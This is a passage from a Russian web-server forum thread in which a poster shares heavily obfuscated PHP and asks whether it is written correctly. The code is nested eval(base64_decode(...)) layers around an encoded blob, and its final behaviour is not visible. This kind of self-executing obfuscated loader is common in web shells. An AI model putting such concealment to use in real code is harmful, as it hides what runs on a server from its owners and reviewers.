MG12Z2V4ZCUwSj4+bH55dHtic3JIeHl0cj8zSEVSRkJSRENMMG12Z2V4ZCUwSj4sahodfnE/fmRkcmM/M0hFUkZCU
kRDTDBtdmdleGQkMEo+PmwzcHZkYypxeGdyeT8zSEVSRkJSRENMMG12Z2V4ZCRIJjBKOzVgNT4scWdiY2Q/M3B2ZG
M7M0hFUkZCUkRDTDBtdmdleGQkSCUwSj4scXR7eGRyPzNwdmRjPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V
4ZCMwSj4+bHp4YXJIYmd7eHZzcnNIcX57cj8zSFFeW1JETDBtdmdleGQjSCYwSkwwY3pnSHl2enIwSjszSEVSRkJS
RENMMG12Z2V4ZCNIJTBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V4ZCIwSj4+bGJ5e355fD8zSEVSRkJSR
ENMMG12Z2V4ZCIwSj4samoaHQ==";echo '(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlY
TmxOalJmWkdWamIyUmxLQ0pLUmxsNlRY cFJOVTVVYXpKTmFtTTVXVzFHZWxwVVdU QllNbEpzV1RJNWExcFRaMmxYV
npGSFpXeHdWVmRVUWxsTmJFcHpWMVJKT ldFeGNGSlFWREJwUzFSemExWnFVVEZOZ WtWNFRucFplazlFTVdsWldFNX
NUbXBTWmxwSFZtcGlNbEpzUzBOS2FrMH hTalZaYTJSWFpGTkpjRTk1VWxkT2VsVX dUWHBuZVU5VVRYbFFWMHBvWXp
KVk1rNUdPV3RhVjA1MldrZFZiMGxzYTN saFNHdHBTMVJ6YTFacVozbFBSR2QzVFd wUmQwOVVNV2xaV0U1c1RtcFNa
bHBIVm1waU1sSnNTME5LYVUwd2NISkph V3MzU2taWk5VMXFhelZOZWxVMFRWUmpP Vmx0Um5wYVZGa3dXREpTYkZre
U9XdGFVMmRwVjJwT2QyTkhTblJYYms1Y VYwWktjMGxwYXpjaUtTazdaWFpoYkNoa VlYTmxOalJmWkdWamIyUmxLQ0
pLUmxsNVRXcFZNRTlFV1RGTmVrazVTa1 paZWsxNlVUVk9WR3N5VFdwamIwcEdXWG xOYWxVd1QwUlpNVTE2U1hCUGV
WSlhUbFJGZUUxNldUVk5ha2t5VUZOU1Y wNUVWWHBOVkVVelRtcE5ORXREVWxkTmF ra3hUa1JuTWs1VVRYbExWSE05
SWlrcE93PT0iKSk7ZXZhbChiYXNlNjRf ZGVjb2RlKCJKRll4T0RFME1ESTBNVFE5 SnljN1ptOXlLQ1JXTmpFd09Ua
zVPRE01UFRBN0pGWTJNVEE1T1RrNE16a zhKRlkxTVRFek5qa3lNalk3SkZZMk1UQ TVPVGs0TXprckt5bDdKRll4T0
RFME1ESTBNVFF1UFNSV056VTBNemd5T1 RNeUtDZ2tWamd5T0Rnd01qUXdPU2drVm pJeU5UUTROalV6TWxza1ZqWXh
NRGs1T1Rnek9WMHBYakk1TmprME5qRTVPU2twTzMxbGRtRnNLQ1JXTVRneE5EQXlOREUwS1RzPSIpKTs="))';

======
Правильно ли?
Если нет можете наглядно показать как именно нужно делать?
 
 Top
Страниц (1): [1]
Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)
« Apache и другие веб-серверы »


Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.
 



Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB